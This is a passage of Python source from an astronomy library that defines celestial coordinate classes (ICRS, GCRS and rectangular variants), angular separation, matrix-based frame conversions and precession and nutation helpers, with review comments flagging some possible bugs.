    latstr = self._lat.getDmsStr(canonical=canonical)
    parts = [self._longlatnames_[0]+'='+longstr,
             self._longlatnames_[1]+'='+latstr]
    return sep.join(parts)
def __eq__(self,other):
    """Equal iff `other` exposes `lat` and `long` attributes that match ours."""
    if not (hasattr(other,'lat') and hasattr(other,'long')):
        return False
    return self._lat==other.lat and self._long==other.long
def __ne__(self,other):
    return not self.__eq__(other)
def __sub__(self,other):
    """
    Computes the angular separation between this coordinate and `other`
    using the haversine formula (numerically stable for small separations).

    :param other: any object exposing angular `lat` and `long` attributes
    :returns: an :class:`AngularSeparation` in degrees
    :raises ValueError: if `other` does not have lat/long attributes
    """
    if isinstance(other,LatLongCoordinates) or (hasattr(other,'lat') and hasattr(other,'long')):
        from math import cos,degrees,acos,asin,sin,sqrt
        b1 = self._lat.radians
        b2 = other.lat.radians
        db = abs(b2 - b1)
        dl = abs(other.long.radians - self._long.radians)
        #haversin(theta) = (1-cos(theta))/2 = sin^2(theta/2)
        #has better numerical accuracy if sin for theta ~ 0, cos ~ pi/2
        haversin = lambda t:(1-cos(t))/2 if pi/4 < (t%pi) < 3*pi/4 else sin(t/2)**2
        hdb = haversin(db)
        hdl = haversin(dl)
        # haversine of the separation on the sphere
        havsep = hdb + cos(b1)*cos(b2)*hdl
        #archaversin -- again picking the form with better conditioning
        sep = acos(1 - 2*havsep) if 0.25 < havsep <= 0.75 else 2*asin(havsep**0.5)
        #straightforward definition without the tweaks using haversin - this
        #is in principal faster, but in practice it ends up only about
        #10% faster due to the other overhead
        #sep = acos(sin(b1)*sin(b2)+cos(b1)*cos(b2)*cos(dl))
        return AngularSeparation(degrees(sep))
#        #small angle version
#        from math import cos,degrees,sqrt
#        clat = cos((self._lat.radians+other._lat.radians)/2)
#        dcorrlong = (self._long.radians - other._long.radians)*clat
#        dlat = self._lat.radians-other._lat.radians
#        sep = AngularSeparation(degrees(sqrt(dlat*dlat+dcorrlong*dcorrlong)))
#        return sep
    else:
        raise ValueError("unsupported operand type(s) for -: '%s' and '%s'"%(self.__class__,other.__class__))
@staticmethod
@CoordinateSystem.addTransType
def _smatrix(m,coord,tocls):
    """Generic matrix transform: copy `coord`'s angular state into a new
    `tocls` instance and rotate it by the matrix `m`."""
    out = tocls()
    out.lat = coord._lat
    out.long = coord._long
    out.laterr = coord._laterr
    out.longerr = coord._longerr
    out.matrixRotate(m)
    return out
def matrixRotate(self,matrix,apply=True,fixrange=True,unitarycheck=False):
    """
    Applies the supplied unitary rotation matrix to these coordinates.
    :param matrix: the transformation matrix in cartesian coordinates
    :type matrix: a 3x3 :class:`numpy.matrix`
    :param apply:
        If True, the transform will be applied inplace to the coordinates
        for this object
    :type apply: boolean
    :param fixrange:
        If True the latitude is autmoatically fixed to be on (-pi/2,pi/2)
        and the longitude is on (0,2pi). Otherwise the raw coordinate is
        output.
    :type fixrange: boolean
    :param unitarycheck:
        If True and the matrix is not unitary, a ValueError will be raised.
        Otherwise no check is performed.
    :type unitarycheck: boolean
    :returns:
        (lat,long) as decimal radians after the transformation matrix is
        applied or (lat,long,laterr,longerr) if errors are nonzero
    """
    #for single values, math module is much faster than numpy
    m = np.asmatrix(matrix)
    if unitarycheck:
        mdagger = m.H
        # a True flag uses the default tolerance; a numeric value is used
        # directly as the relative tolerance
        rtol = 1e-5 if unitarycheck is True else unitarycheck
        if not np.allclose(mdagger*m,m*mdagger,rtol):
            raise ValueError('matrix not unitary')
    lat = self.lat.radians
    long = self.long.radians
    laterr = 0 if self.laterr is None else self.laterr.radians
    longerr = 0 if self.longerr is None else self.longerr.radians
    sb = sin(lat)
    cb = cos(lat)
    sl = sin(long)
    cl = cos(long)
    #spherical w/ r=1 > cartesian
    x = cb*cl
    y = cb*sl
    z = sb
    #do transform
    v = np.matrix((x,y,z)).T
    xp,yp,zp = (m*v).A1
    #cartesian > spherical
    sp = sqrt(xp*xp+yp*yp) #cylindrical radius
    latp = atan2(zp,sp)
    longp = atan2(yp,xp)
    #propogate errors if they are present
    if laterr != 0 or longerr != 0:
        #TODO: check formulae
        #all of these are first order taylor expansions about the value
        dx = sqrt((laterr*sb*cl)**2+(longerr*cb*sl)**2)
        dy = sqrt((laterr*sb*sl)**2+(longerr*cb*cl)**2)
        dz = abs(laterr*cb)
        dv = np.matrix((dx,dy,dz))
        # NOTE(review): dv is a 1x3 row matrix, so np.power(m,2)*np.power(dv,2)
        # is a (3,3)x(1,3) product -- dv.T looks intended here; confirm before
        # relying on the error-propagation path
        dxp,dyp,dzp = np.sqrt(np.power(m,2)*np.power(dv,2))
        #intermediate variables for dlatp - each of the partial derivatives
        chi = 1/(1+(zp/sp)**2)
        #common factor chi not included below
        dbdx = x*z*sp**-3
        dbdy = y*z*sp**-3
        dbdz = 1/sp
        dlatp = chi*sqrt((dxp*dbdx)**2 + (dyp*dbdy)**2 + (dzp*dbdz)**2)
        dlongp = sqrt((dxp*yp*xp**-2)**2 + (dyp/xp)**2)/(1 + (yp/xp)**2) #indep of z
    else:
        laterr = None
    if fixrange:
        # triangle-wave fold of latitude into [-pi/2,pi/2]
        ao = (latp+_pio2)/_twopi
        latp = _twopi*abs((ao-np.floor(ao+0.5)))-_pio2
        longp = longp % _twopi
    if apply:
        self.lat.radians = latp
        self.long.radians = longp
        if laterr is not None:
            self.laterr.radians = dlatp
            self.longerr.radians = dlongp
    if laterr is None:
        return latp,longp
    else:
        return latp,longp,dlatp,dlongp
def convert(self,tosys,optimize=_convertoptimizedefault):
    """
    Converts the coordinate system from it's current system to a new
    :class:`CoordinateSystem` object possibly with optimizations for
    matrix-based transformation of :class:`LatLongCoordinates` objects.
    .. warning::
        The transformation optimizations used if `optimize` is True are only
        correct if the conversion matricies are independent of the
        coordinate values themselves (e.g. are linear and
        epoch-independent). Examples that are good for optimization include
        FK4->FK5->ICRS (all are epoch-independent).
        In the future, this system will be smarter about
        knowing when it is safe to optimize, but for now, only use it if
        you're sure it will work correctly.
    :param tosys:
        The new coordinate system class. Should be a subclass of
        :class:`CoordinateSystem` .
    :param bool optimize:
        If True, speed up the transformation by composing matricies where
        possible. If False, the standard transformation is performed.
    :returns: A new object of a class determined by `tosys`
    :except: raises NotImplementedError if converters are not present
    """
    if tosys is self.__class__:
        return self
    if optimize:
        # composed matrix converters are cached per (source class, target
        # class) pair so repeated conversions skip the composition work
        cache = CoordinateSystem._transformcache['smatrix']
        #add this object to the cache if its missing
        if self.__class__ not in cache:
            cache[self.__class__] = {}
        if tosys not in cache[self.__class__]:
            convs = CoordinateSystem.getTransformPath(self.__class__,tosys)
            if callable(convs): #direct transform
                convs = [convs]
            else:
                convclasses = convs
                # pairwise converter functions along the class path
                convfuncs = [CoordinateSystem._converters[c1][c2] for c1,c2 in zip(convclasses[:-1],convclasses[1:])]
                convs = []
                #now we populate convs with converter functions that are
                #either multplied-together matricies if they are smatrix
                #converters or the actual converter function otherwise
                combinedmatrix = None
                lastcls = None  # NOTE(review): unused
                for cls,cfunc in zip(convclasses[:-1],convfuncs):
                    #note that cls here is the *previous* conversion's end
                    #class/current conversion's start class...
                    if cfunc.transtype=='smatrix':
                        mt = cfunc.basetrans(self)
                        # converters may forbid caching (e.g. epoch-dependent
                        # matricies) by flagging the matrix with .nocache
                        if hasattr(mt,'nocache') and mt.nocache:
                            cache = None
                        if combinedmatrix is None:
                            combinedmatrix = mt
                        else:
                            combinedmatrix = mt * combinedmatrix
                    else:
                        # non-matrix converter: flush any pending composed
                        # matrix before appending the function itself
                        # NOTE(review): combinedmatrix is not reset to None
                        # after the flush, so a later smatrix step would
                        # re-apply the already-flushed matrix -- confirm that
                        # mixed smatrix/non-smatrix paths cannot occur
                        if combinedmatrix is None:
                            convs.append(cfunc)
                        else:
                            convs.append(_OptimizerSmatrixer(combinedmatrix,cls))
                            convs.append(cfunc)
                if combinedmatrix is not None:
                    convs.append(_OptimizerSmatrixer(combinedmatrix,convclasses[-1]))
            #now cache this transform for future use unless it was banned above
            if cache is not None:
                cache[self.__class__][tosys] = convs
        else:
            convs = cache[self.__class__][tosys]
        #now actually do the transforms
        coord = self
        for conv in convs:
            coord = conv(coord)
        return coord
    else:
        return CoordinateSystem.convert(self,tosys)
class _OptimizerSmatrixer(object):
    """
    Used internally to do the optimization of :meth`LatLongCoordinates.convert`
    """
    #mimic the smatrix converter-function interface
    transtype = 'smatrix'
    def __init__(self,combinedmatrix,tocls):
        #pre-composed rotation matrix and the target coordinate class
        self.combinedmatrix = combinedmatrix
        self.tocls = tocls
    def __call__(self,coord):
        """Apply the composed matrix transform to `coord`."""
        return LatLongCoordinates._smatrix(self.combinedmatrix,coord,self.tocls)
    def basetrans(self,coords):
        """Return the underlying matrix (coordinate-independent by design)."""
        return self.combinedmatrix
class EpochalLatLongCoordinates(LatLongCoordinates,EpochalCoordinates):
    """
    A Coordinate system where the coordinates change as a function of time.
    The origin and orientation of some coordinate systems are tied to the motion
    of the Earth and Solar System and hence must be updated as time passes.
    In general this only accounts for epoch-related changes in its own
    coordinate system. If (for example) one has a :class:`ITRSCoordinates`
    coordinate, changing the epoch only updates for polar motion. To properly
    update all epoch-related effects such as precession/nutation and earth
    rotation, the coordinate should be transformed to :class:`ICRSCoordinates` ,
    update the epoch, and transform back to :class:`ITRSCoordinates` .
    """
    __slots__ = tuple()
    # epochs for these systems are Julian epochs
    julianepoch = True
    def __init__(self,long=0,lat=0,longerr=None,laterr=None,epoch=None,distancepc=None):
        """
        See the associated attribute docstrings for the meaning of the inputs.
        """
        LatLongCoordinates.__init__(self,long,lat,longerr,laterr,distancepc)
        self._epoch = epoch
    def __getstate__(self):
        # merge pickle state from both parent classes
        d = LatLongCoordinates.__getstate__(self)
        d.update(EpochalCoordinates.__getstate__(self))
        return d
    def __setstate__(self,d):
        LatLongCoordinates.__setstate__(self,d)
        EpochalCoordinates.__setstate__(self,d)
    @add_docs(LatLongCoordinates.convert)
    def convert(self,tosys,optimize=_convertoptimizedefault):
        ''
        # same as LatLongCoordinates.convert, but carries the epoch over to
        # the result when the target system is also epochal
        res = LatLongCoordinates.convert(self,tosys,optimize)
        if issubclass(tosys,EpochalLatLongCoordinates):
            res._epoch = self._epoch
        return res
    convert.__doc__ = LatLongCoordinates.convert.__doc__
class EquatorialCoordinatesBase(EpochalLatLongCoordinates):
    """
    This object represents an angular location on the unit sphere, specified in
    right ascension and declination. Some of the subclasses are not strictly
    speaking equatorial, but they are close, or are tied to the equatorial
    position of a particular epoch.
    This is a superclass for all other Equatorial Coordinate systems -
    particular reference systems implement the :meth:`transformToEpoch` method.
    See the docstring for :class:`EpochalLatLongCoordinates` for subclassing
    suggestions.
    """
    __slots__ = tuple()
    # the underlying long/lat pair is exposed as ra/dec
    _longlatnames_ = ('ra','dec')
    _longrange_ = (0,360)
    def __str__(self):
        rastr = self.ra.getHmsStr(canonical=True)
        decstr = self.dec.getDmsStr(canonical=True)
        #2.6 required for format
        #return '{3}: {0} {1} ({2})'.format(rastr,decstr,self.epoch,self.__class__.__name__)
        return '%s: %s %s %s'%(self.__class__.__name__,rastr,decstr,self.epochstr)
    def __init__(self,*args,**kwargs):
        """
        Input for equatorial coordinates. Can follow any of the following forms:
        * EquatorialCoordinatesBase()
        * EquatorialCoordinatesBase(:class:`EquatorialCoordinatesBase`)
        * EquatorialCoordinatesBase('rastr decstr')
        * EquatorialCoordinatesBase((ra,dec))
        * EquatorialCoordinatesBase(ra,dec)
        * EquatorialCoordinatesBase(ra,dec,raerr,decerr)
        * EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch)
        * EquatorialCoordinatesBase(ra,dec,raerr,decerr,epoch,distancepc)
        Note that the default epoch is 2000 if not otherwise specified. To
        disable epoch tranformations, set the epoch to None. If scalar values
        are provided, they are assumed to be degrees.
        """
        # translate the positional forms above into keyword arguments
        # NOTE(review): 3 positional args (or >6) fall through all branches
        # and are silently ignored -- a TypeError might be preferable; confirm
        # no callers rely on this
        posargs = {}
        if len(args) == 0:
            pass
        if len(args) == 1:
            # copy-constructor form: delegate entirely and return early
            if isinstance(args[0],EquatorialCoordinatesBase):
                EpochalLatLongCoordinates.__init__(self, args[0].ra, args[0].dec,
                                                   args[0].raerr, args[0].decerr,
                                                   args[0].epoch, args[0].distancepc)
                return
            elif isinstance(args[0],basestring):
                # 'rastr decstr' form (py2 basestring)
                sargs = args[0].split()
                posargs['ra'] = sargs[0]
                posargs['dec'] = sargs[1]
            else:
                # (ra,dec) sequence form
                posargs['ra'],posargs['dec'] = args[0]
        elif len(args) == 2:
            posargs['ra'] = args[0]
            posargs['dec'] = args[1]
        elif len(args) == 4:
            posargs['ra'] = args[0]
            posargs['dec'] = args[1]
            posargs['raerr'] = args[2]
            posargs['decerr'] = args[3]
        elif len(args) == 5:
            posargs['ra'] = args[0]
            posargs['dec'] = args[1]
            posargs['raerr'] = args[2]
            posargs['decerr'] = args[3]
            posargs['epoch'] = args[4]
        elif len(args) == 6:
            posargs['ra'] = args[0]
            posargs['dec'] = args[1]
            posargs['raerr'] = args[2]
            posargs['decerr'] = args[3]
            posargs['epoch'] = args[4]
            posargs['distancepc'] = args[5]
        # positional and keyword forms must not overlap
        for k,v in posargs.iteritems():
            if k in kwargs:
                raise ValueError('got multiple values for argument '+k)
            kwargs[k] = v
        kwargs.setdefault('ra',0)
        kwargs.setdefault('dec',0)
        kwargs.setdefault('raerr',None)
        kwargs.setdefault('decerr',None)
        kwargs.setdefault('epoch',2000)
        EpochalLatLongCoordinates.__init__(self,kwargs['ra'],kwargs['dec'],kwargs['raerr'],kwargs['decerr'])
        if 'epoch' in kwargs:
            self.epoch = kwargs['epoch']
        # distance may be given in pc or AU, but not both
        if 'distancepc' in kwargs:
            if 'distanceau' in kwargs:
                raise TypeError("can't specify distance in both pc and au")
            self.distancepc = kwargs['distancepc']
        elif 'distanceau' in kwargs:
            self.distanceau = kwargs['distanceau']
        else:
            self._dpc = None
    @add_docs(EpochalLatLongCoordinates.convert)
    def convert(self,tosys,optimize=_convertoptimizedefault):
        ''
        # as the parent convert, but also carries the distance over
        res = EpochalLatLongCoordinates.convert(self,tosys,optimize)
        if self._dpc is not None:
            res._dpc = self._dpc
        return res
    convert.__doc__ = EpochalLatLongCoordinates.convert.__doc__
class ICRSCoordinates(EquatorialCoordinatesBase):
    """
    Equatorial Coordinates tied to the International Celestial Reference System
    (ICRS). Strictly speaking this is not an Equatorial system, as it is an
    inertial frame that only aligns with Earth's equator at J2000, but it is
    nearly an equatorial system at J2000.
    .. note::
        Technically, this is actually the Barycentric Celestial Reference System
        (BCRS), distinguished from ICRS by having accounted for space motion. In
        astropysics, instead, space motion is already accounted for by using
        a :class:`astropysics.coords.ephems.EphemerisObject` object, which yields
        coordinates (often :class:`ICRSCoordinates`) at the epoch of
        observation.
    .. warning::
        Aberration of starlight is not yet implemented in transformations
        to/from ICRS.
    """
    __slots__ = tuple()
    def transformToEpoch(self,newepoch):
        """
        ICRS is an inertial frame, so no transformation is necessary
        """
        # only the stored epoch value changes
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    #Conversions to/from ICRS are in the other coordinate systems
    def __makeFrameBias():
        from ..utils import rotation_matrix
        #using USNO circular 179 for frame bias -- all in milliarcsec
        da0 = -14.6
        xi0 = -16.6170
        eta0 = -6.8192
        #mas->degrees
        return rotation_matrix(-eta0/3600000,axis='x') *\
               rotation_matrix(xi0/3600000,axis='y') *\
               rotation_matrix(da0/3600000,axis='z')
    # computed once at class-definition time
    frameBiasJ2000 = __makeFrameBias()
    """
    Frame bias matrix such that vJ2000 = B*vICRS .
    """
    #make it a static method just for clarity even though it isn't really visible
    __makeFrameBias = staticmethod(__makeFrameBias)
class RectangularICRSCoordinates(RectangularCoordinates,EpochalCoordinates):
    """
    Rectangular coordinates aligned to the ICRS with origin at the solar system
    barycenter. The positive z-axis points to the north celestial pole and the
    positive x-axis is along with the (0,0) point of the equatorial ICRS.
    .. note::
        Units for the coordinates are specified via the :attr:`unit` attribute.
        When converting *from* :class:`ICRSCoordinates`, distances default to AU
        if less than 1000 AU, otherwise, pc. If a distance is not present, the
        default distance is 1 (unspecified unit).
    """
    __slots__ = tuple()
    # epochs are Julian epochs
    julianepoch = True
    def __init__(self,x,y,z,epoch=None,unit='pc'):
        """
        :param x,y,z: rectangular components in the ICRS frame
        :param epoch: Julian epoch, or None
        :param unit: 'au', 'pc', or None (see :attr:`unit`)
        """
        RectangularCoordinates.__init__(self,x,y,z)
        self._epoch = epoch
        self._unit = None
        self.unit = unit
    def __getstate__(self):
        # merge pickle state from both parent classes
        d = RectangularCoordinates.__getstate__(self)
        d.update(EpochalCoordinates.__getstate__(self))
        return d
    def __setstate__(self,d):
        RectangularCoordinates.__setstate__(self,d)
        EpochalCoordinates.__setstate__(self,d)
    def __str__(self):
        if self.epoch is None:
            epochstr = ''
        else:
            epochstr = ' ('+self.epochstr+')'
        return RectangularCoordinates.__str__(self) + epochstr
    def transformToEpoch(self,newepoch):
        # rectangular ICRS components are epoch-independent; only the stored
        # epoch changes
        EpochalCoordinates.transformToEpoch(self,newepoch)
    def _getUnit(self):
        return self._unit
    def _setUnit(self,val):
        from ..constants import auperpc
        # changing between 'au' and 'pc' rescales the stored components
        if val is None:
            self._unit = None
        elif self._unit is None and (val in ('au','pc')):
            # no previous unit: just adopt the new one without rescaling
            self._unit = val
        elif val=='au':
            if self._unit == 'pc':
                self.x *= auperpc
                self.y *= auperpc
                self.z *= auperpc
            self._unit = val
        elif val == 'pc':
            if self._unit == 'au':
                self.x /= auperpc
                self.y /= auperpc
                self.z /= auperpc
            self._unit = val
        else:
            raise ValueError("unit must be 'au' or 'pc' - got %s"%val)
    unit = property(_getUnit,_setUnit,doc="""The unit for these coordinates.
    Must be 'au', 'pc', or None - setting to anything else will raise a
    :exc:`ValueError`. If not None, setting to a new unit will convert the
    values from AU to pc or vice versa.
    """)
    @CoordinateSystem.registerTransform('self',ICRSCoordinates)
    def _toICRS(ric):
        # cartesian -> spherical (angles in degrees)
        from math import asin,atan2,degrees
        x,y,z = ric.x,ric.y,ric.z
        r = (x*x+y*y+z*z)**0.5
        dec = degrees(asin(z/r))
        ra = degrees(atan2(y,x))
        if ric.unit is None:
            return ICRSCoordinates(ra,dec,epoch=ric.epoch)
        elif ric.unit == 'pc':
            return ICRSCoordinates(ra,dec,distancepc=r,epoch=ric.epoch)
        elif ric.unit == 'au':
            return ICRSCoordinates(ra,dec,distanceau=r,epoch=ric.epoch)
        else:
            raise NotImplementedError('Unrecognized unit %s in RectICRS->ICRS'%ric.unit)
    @CoordinateSystem.registerTransform(ICRSCoordinates,'self')
    def _fromICRS(ic):
        # spherical -> cartesian; unit chosen by distance magnitude
        from math import sin,cos
        ra,dec = ic.ra.r,ic.dec.r
        if ic.distanceau is None:
            # no distance: unit sphere with unspecified unit
            r = 1
            unit = None
        elif ic.distanceau>1000:
            r = ic.distancepc[0]
            unit = 'pc'
        else:
            r = ic.distanceau[0]
            unit = 'au'
        x = r*cos(ra)*cos(dec)
        y = r*sin(ra)*cos(dec)
        z = r*sin(dec)
        return RectangularICRSCoordinates(x,y,z,ic.epoch,unit)
class GCRSCoordinates(EquatorialCoordinatesBase):
    """
    Geocentric Celestial Reference System equatorial coordinates. The
    orientation of this coordinates is fixed to the ICRS orientation, but with
    origin at the earth geocenter.
    .. warning::
        Aberration of starlight not yet included in transforms.
    """
    __slots__ = tuple()
    def transformToEpoch(self,newepoch):
        """
        Transforms from the current epoch to a new epoch by converting to ICRS
        and back again in the new epoch.
        """
        # round-trip through the epoch-independent ICRS frame
        c1 = self.convert(ICRSCoordinates)
        c1.epoch = newepoch
        c2 = c1.convert(GCRSCoordinates)
        # copy the converted angular state back into this instance
        self._lat = c2._lat
        self._long = c2._long
        self._laterr = c2._laterr
        self._longerr = c2._longerr
        self._dpc = c2._dpc
        EpochalLatLongCoordinates.transformToEpoch(self,newepoch)
    #TODO:implement direct spherical transformations if needed/wanted for precision
#    @CoordinateSystem.registerTransform('self',ICRSCoordinates,transtype='smatrix')
#    def _toICRS(gc):
#        return np.eye(3).view(np.matrix)
#    @CoordinateSystem.registerTransform(ICRSCoordinates,'self',transtype='smatrix')
#    def _fromICRS(ic):
#        return np.eye(3).view(np.matrix)
class RectangularGCRSCoordinates(RectangularCoordinates,EpochalCoordinates):
    """
    Rectangular coordinates aligned to the GCRS with origin at the Earth
    geocenter. The positive z-axis points to the north celestial pole and the
    positive x-axis points down the (0,0) point of the equatorial GCRS (and
    thus, also ICRS).
    The coordinates at this location are actually an "Astrometric place" - the
    actual location relative to the geocenter. This is distinct from
    :class:`GCRSCoordinates` in that :class:`GCRSCoordinates` *includes*
    aberration and light deflection, while :class:`RectangularGCRSCoordinates`
    does not.
    .. note::
        Units for the coordinates are specified via the :attr:`unit` attribute.
        When converting *from* :class:`GCRSCoordinates`, distances default to AU
        if less than 1000 AU, otherwise, pc. If a distance is not present, the
        default distance is 1 (unspecified unit).
    """
    __slots__ = tuple()
    # epochs are Julian epochs
    julianepoch = True
    def __init__(self,x,y,z,epoch=None,unit='pc'):
        """
        :param x,y,z: rectangular components in the GCRS frame
        :param epoch: Julian epoch, or None
        :param unit: 'au', 'pc', or None (see :attr:`unit`)
        """
        RectangularCoordinates.__init__(self,x,y,z)
        self._epoch = epoch
        self._unit = None
        self.unit = unit
    def __getstate__(self):
        # merge pickle state from both parent classes
        d = RectangularCoordinates.__getstate__(self)
        d.update(EpochalCoordinates.__getstate__(self))
        return d
    def __setstate__(self,d):
        RectangularCoordinates.__setstate__(self,d)
        EpochalCoordinates.__setstate__(self,d)
    def __str__(self):
        if self.epoch is None:
            epochstr = ''
        else:
            epochstr = ' ('+self.epochstr+')'
        return RectangularCoordinates.__str__(self) + epochstr
    def transformToEpoch(self,newepoch):
        """
        Sets the epoch of these coordinates; the rectangular components
        themselves are left unchanged.
        """
        #BUGFIX: was EpochalCoordinates.transformToEpoch(newepoch), which
        #passed `newepoch` as `self` in the unbound call (cf. the matching
        #method on RectangularICRSCoordinates)
        EpochalCoordinates.transformToEpoch(self,newepoch)
    def _getUnit(self):
        return self._unit
    def _setUnit(self,val):
        from ..constants import auperpc
        # changing between 'au' and 'pc' rescales the stored components
        if val is None:
            self._unit = None
        elif self._unit is None and (val in ('au','pc')):
            # no previous unit: just adopt the new one without rescaling
            self._unit = val
        elif val=='au':
            if self._unit == 'pc':
                self.x *= auperpc
                self.y *= auperpc
                self.z *= auperpc
            self._unit = val
        elif val == 'pc':
            if self._unit == 'au':
                self.x /= auperpc
                self.y /= auperpc
                self.z /= auperpc
            self._unit = val
        else:
            raise ValueError("unit must be 'au' or 'pc' - got %s"%val)
    unit = property(_getUnit,_setUnit,doc="""The unit for these coordinates.
    Must be 'au', 'pc', or None - setting to anything else will raise a
    :exc:`ValueError`. If not None, setting to a new unit will convert the
    values from AU to pc or vice versa.
    """)
    @CoordinateSystem.registerTransform('self',GCRSCoordinates)
    def _toGCRS(rgc):
        # cartesian -> spherical (angles in degrees)
        from math import asin,atan2,degrees
        #TODO:implement aberration and light deflection
        x,y,z = rgc.x,rgc.y,rgc.z
        r = (x*x+y*y+z*z)**0.5
        dec = degrees(asin(z/r))
        ra = degrees(atan2(y,x))
        if rgc.unit is None:
            return GCRSCoordinates(ra,dec,epoch=rgc.epoch)
        elif rgc.unit == 'pc':
            return GCRSCoordinates(ra,dec,distancepc=r,epoch=rgc.epoch)
        elif rgc.unit == 'au':
            return GCRSCoordinates(ra,dec,distanceau=r,epoch=rgc.epoch)
        else:
            raise NotImplementedError('Unrecognized unit %s in RectGCRS->GCRS'%rgc.unit)
    @CoordinateSystem.registerTransform(GCRSCoordinates,'self')
    def _fromGCRS(gc):
        # spherical -> cartesian; unit chosen by distance magnitude
        from math import sin,cos
        #TODO:implement aberration and light deflection
        ra,dec = gc.ra.r,gc.dec.r
        if gc.distanceau is None:
            # no distance: unit sphere with unspecified unit
            r = 1
            unit = None
        elif gc.distanceau>1000:
            r = gc.distancepc[0]
            unit = 'pc'
        else:
            r = gc.distanceau[0]
            unit = 'au'
        x = r*cos(ra)*cos(dec)
        y = r*sin(ra)*cos(dec)
        z = r*sin(dec)
        return RectangularGCRSCoordinates(x,y,z,gc.epoch,unit)
    @CoordinateSystem.registerTransform('self',RectangularICRSCoordinates)
    def _toRectICRS(rgc):
        from .ephems import earth_pos_vel
        from ..obstools import epoch_to_jd
        from ..constants import auperpc
        x = rgc.x
        y = rgc.y
        z = rgc.z
        unit = rgc.unit
        epoch = rgc.epoch
        # the geocenter offset from the barycenter is epoch-dependent
        if epoch is None:
            raise ValueError('cannot transform GCRS to ICRS without an epoch')
        if unit is None: #infinitely far, so no corrections
            return RectangularICRSCoordinates(x,y,z,epoch,unit=None)
        else: #do parallax correction
            # Earth barycentric position in AU at this epoch
            xe,ye,ze = earth_pos_vel(epoch_to_jd(epoch),True)[0]
            if unit == 'au':
                xp = x - xe
                yp = y - ye
                zp = z - ze
            elif unit == 'pc':
                xp = x - xe/auperpc
                yp = y - ye/auperpc
                zp = z - ze/auperpc
            else:
                raise NotImplementedError('Unit %s not supported by GCRS->ICRS'%unit)
            return RectangularICRSCoordinates(xp,yp,zp,epoch,unit=unit)
    @CoordinateSystem.registerTransform(RectangularICRSCoordinates,'self')
    def _fromRectICRS(ric):
        from .ephems import earth_pos_vel
        from ..obstools import epoch_to_jd
        from ..constants import auperpc
        x = ric.x
        y = ric.y
        z = ric.z
        unit = ric.unit
        epoch = ric.epoch
        if epoch is None:
            raise ValueError('cannot transform ICRS to GCRS without an epoch')
        if unit is None: #infinitely far, so no corrections
            return RectangularGCRSCoordinates(x,y,z,epoch,unit=None)
        else: #do parallax correction
            # Earth barycentric position in AU at this epoch
            xe,ye,ze = earth_pos_vel(epoch_to_jd(epoch),True)[0]
            if unit == 'au':
                xp = x - xe
                yp = y - ye
                zp = z - ze
            elif unit == 'pc':
                xp = x - xe/auperpc
                yp = y - ye/auperpc
                zp = z - ze/auperpc
            else:
                raise NotImplementedError('Unit %s not supported by ICRS->GCRS'%unit)
            return RectangularGCRSCoordinates(xp,yp,zp,epoch,unit=unit)
def _precession_matrix_J2000_Capitaine(epoch):
    """
    Computes the precession matrix from J2000 to the given Julian Epoch.
    Expression from Capitaine et al. 2003 as written in the USNO
    Circular 179. This should match the IAU 2006 standard from SOFA
    (although this has not yet been tested)
    """
    from ..utils import rotation_matrix
    # T is Julian centuries from J2000.0
    T = (epoch-2000.0)/100.0
    #from USNO circular
    # polynomial coefficients (highest order first, for np.polyval), arcsec
    pzeta = (-0.0000003173,-0.000005971,0.01801828,0.2988499,2306.083227,2.650545)
    pz = (-0.0000002904,-0.000028596,0.01826837,1.0927348,2306.077181,-2.650545)
    ptheta = (-0.0000001274,-0.000007089,-0.04182264,-0.4294934,2004.191903,0)
    # arcsec -> degrees
    zeta = np.polyval(pzeta,T)/3600.0
    z = np.polyval(pz,T)/3600.0
    theta = np.polyval(ptheta,T)/3600.0
    # classic equatorial precession sequence: Rz(-z) Ry(theta) Rz(-zeta)
    return rotation_matrix(-z,'z') *\
           rotation_matrix(theta,'y') *\
           rotation_matrix(-zeta,'z')
def _load_nutation_data(datafn,seriestype):
    """
    Loads nutation series from saved data files.
    Seriestype can be 'lunisolar' or 'planetary'

    :param datafn: name of the packaged data file to load
    :param seriestype: 'lunisolar' or 'planetary' -- selects the column layout
    :returns: a :class:`numpy.recarray` with one field per column
    :raises ValueError: for any other `seriestype`
    """
    from ..utils.io import get_package_data
    # (name, converter) pairs, one per whitespace-separated column
    if seriestype == 'lunisolar':
        dtypes = [('nl',int),
                  ('nlp',int),
                  ('nF',int),
                  ('nD',int),
                  ('nOm',int),
                  ('ps',float),
                  ('pst',float),
                  ('pc',float),
                  ('ec',float),
                  ('ect',float),
                  ('es',float)]
    elif seriestype == 'planetary':
        dtypes = [('nl',int),
                  ('nF',int),
                  ('nD',int),
                  ('nOm',int),
                  ('nme',int),
                  ('nve',int),
                  ('nea',int),
                  ('nma',int),
                  ('nju',int),
                  ('nsa',int),
                  ('nur',int),
                  ('nne',int),
                  ('npa',int),
                  ('sp',int),
                  ('cp',int),
                  ('se',int),
                  ('ce',int)]
    else:
        raise ValueError('requested invalid nutation series type')
    # drop comment lines and blank lines
    lines = [l for l in get_package_data(datafn).split('\n') if not l.startswith('#') if not l.strip()=='']
    lists = [[] for n in dtypes]
    for l in lines:
        # NOTE(review): split(' ') assumes exactly single-space separation in
        # the data files -- runs of spaces would produce empty fields
        for i,e in enumerate(l.split(' ')):
            lists[i].append(dtypes[i][1](e))
    return np.rec.fromarrays(lists,names=[e[0] for e in dtypes])
# IAU 2000A nutation series coefficients, loaded once at import time
_nut_data_00a_ls = _load_nutation_data('iau00a_nutation_ls.tab','lunisolar')
_nut_data_00a_pl = _load_nutation_data('iau00a_nutation_pl.tab','planetary')
def _nutation_components20062000A(epoch):
    """
    Nutation components from the IAU 2006/2000A model.

    :param epoch: Julian epoch at which to compute the nutation
    :returns: eps,dpsi,deps in radians

    .. warning::
        Not yet implemented -- always raises :exc:`NotImplementedError`.
    """
    from ..obstools import epoch_to_jd
    from .funcs import obliquity
    # mean obliquity per the IAU 2006 model; kept so the implementation can be
    # completed here later
    epsa = obliquity(epoch_to_jd(epoch),2006)
    # BUGFIX: the original had an unreachable `return epsa,dpsi,deps` after
    # this raise that referenced undefined names dpsi/deps -- removed
    raise NotImplementedError('2006/2000A nutation model not implemented')
# IAU 2000B (truncated lunisolar) nutation series, loaded once at import time
_nut_data_00b = _load_nutation_data('iau00b_nutation.tab','lunisolar')
def _nutation_components2000B(intime,asepoch=True):
    """
    :param intime: time to compute the nutation components as a JD or epoch
    :type intime: scalar
    :param asepoch: if True, `intime` is interpreted as an epoch, otherwise JD
    :type asepoch: bool
